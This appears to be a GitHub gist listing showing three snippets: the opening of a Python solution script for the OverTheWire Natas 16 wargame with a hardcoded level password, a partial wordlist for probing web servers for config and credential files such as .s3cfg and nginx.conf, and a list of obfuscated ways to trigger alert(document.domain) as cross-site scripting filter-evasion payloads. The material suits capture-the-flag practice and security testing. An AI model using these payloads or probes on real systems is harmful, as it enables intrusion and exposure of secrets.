Skip to content

Instantly share code, notes, and snippets.

@bugpie54
bugpie54 / password.py
Last active January 24, 2021 20:58
OverTheWire: Natas 16 Solution
import requests
from requests.auth import HTTPBasicAuth
auth = HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
existing_chars = ''
password = ''
for char in chars:
@bugpie54
bugpie54 / short-wordlist.txt
Created November 10, 2020 11:18 — forked from tomnomnom/short-wordlist.txt
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
@bugpie54
bugpie54 / alert.js
Created November 10, 2020 11:17 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);